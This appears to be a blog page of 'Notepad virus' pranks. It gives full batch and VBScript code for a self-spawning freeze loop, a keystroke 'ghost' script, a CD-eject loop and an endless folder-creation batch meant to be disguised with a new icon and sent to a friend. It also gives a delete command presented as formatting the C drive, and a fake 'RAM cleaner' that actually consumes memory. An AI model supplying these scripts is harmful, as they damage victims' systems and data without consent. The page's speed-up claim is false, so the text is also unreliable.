Make a freez virus only for fun






hello....
i have a new trick for making a freez virus.
it is totaly harmless and it is only for fun.
try it and watch result!!! :)
WARNING:-dont try it on angry friends..... hahahahaha



trick:
1. open notepad
2. type "start virus.bat"
3. next line type "virus.bat"
4.save it as "virus.bat"
5.now open file and watch....

for stop this the only solution is shut down.
i also did this so many time....
enjoy:)

Create a funny ghost virus on your friend's PC

Create a funny ghost virus on your friend's PC which automates different process like open notepad automatically, write text automatically and run different programs like there is a ghost around you. 
first open your notepad and past the given code and save text with ".vbs"  extension.



Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "notepad"
do
wscript.sleep 400
wshshell.sendkeys "There "
wscript.sleep 700
wshshell.sendkeys "is "
wscript.sleep 700
wshshell.sendkeys "a Ghost "
wscript.sleep 700
wshshell.sendkeys "Around "
wscript.sleep 700
wshshell.sendkeys "You. "
wscript.sleep 700
wshshell.sendkeys "Save "
wscript.sleep 700
wshshell.sendkeys "your "
wscript.sleep 700
wshshell.sendkeys "System "
wscript.sleep 700
wshshell.sendkeys "from "
wscript.sleep 700
wshshell.sendkeys "my "
wscript.sleep 700
wshshell.sendkeys "dirty "
wscript.sleep 700
wshshell.sendkeys "hands "
wscript.sleep 700
wshshell.sendkeys "......."
wscript.sleep 1400
wshshell.sendkeys "ok its "
wscript.sleep 700
wshshell.sendkeys "time to "
wscript.sleep 700
wshshell.sendkeys "stop capture "
wscript.sleep 700
wshshell.sendkeys "this ghost "
wscript.sleep 700
wshshell.sendkeys "just open task manager "
wscript.sleep 700
wshshell.sendkeys "and kill or end "
wscript.sleep 700
wshshell.sendkeys "wscript.exe "
wscript.sleep 700
wshshell.sendkeys "script "
wscript.sleep 700
wshshell.sendkeys "For "
wscript.sleep 700
wshshell.sendkeys "more "
wscript.sleep 700
wshshell.sendkeys "creative ideas "
wscript.sleep 700
wshshell.sendkeys "visit "
wscript.sleep 700
wshshell.sendkeys "w"
wscript.sleep 700
wshshell.sendkeys "w"
wscript.sleep 700
wshshell.sendkeys "w."
wscript.sleep 700
wshshell.sendkeys "computerz"
wscript.sleep 700
wshshell.sendkeys "trick"
wscript.sleep 700
wshshell.sendkeys ".blogspot.in "
wscript.sleep 1400
wshshell.sendkeys "don't "
wscript.sleep 700
wshshell.sendkeys "cry! "
wscript.sleep 700
wshshell.sendkeys "if "
wscript.sleep 700
wshshell.sendkeys "you fail to stop it "
wscript.sleep 700
wshshell.sendkeys "read it "
wscript.sleep 700
wshshell.sendkeys "carefully on "
wscript.sleep 700
wshshell.sendkeys "computerztrick.blogspot.in"
wscript.sleep 1500
wshshell.sendkeys ".......Good bye....... "
loop

Creating Virus That Format C Drive



In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

Create a Harmless Funny Virus with Notepad-Continuously eject CD-DVD drives





open notepad write this code and save in .vbs file

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


save it in .vbs format

Make 1000's of folders in seconds

















Just follow these simple steps:

1.Goto Start-> Run
2.Now type Notepad in the location area.
3.Now a notepad opens,type the following code in it..

@echo off
:top
md %random%
goto top

4.Save it as 1000folders.bat
5.After saving this file change its icon..
6.Now send this file to your friend..
Note:This is not harmful.

Optimise Computer "Speed" by cleaning RAM

one of the main component of computer that is responsible for the process of the operating system. Since all the Operating systems support Multiprocessing, hence require a good RAM speed.
Since all the current running processes are stored onto the RAM, it slows the system speed. Sometimes the process which have executed but are not required by the OS are stored on the RAM. So, we can remove or freeup the RAM with unused junk data to Speedup the System or processing speed.
We can clean the RAM just by using a Notepad application. This donot require any advanced software. The process to do so is as follows.


Open Notepad

Type
FreeMem=Space(64000000)
save it as “CleanRAM.vbs” on desktop
Note: Type the name of file along with inverted commas
Run the file and your RAM may be free.
Of course you can edit the code in the file for a greater “cleaning-progress”.
For example:
FreeMem=Space(1280000000)
FreeMem=Space(2560000000)
FreeMem=Space(5120000000)
FreeMem=Space(10240000000)
Smit Vadher
(computers)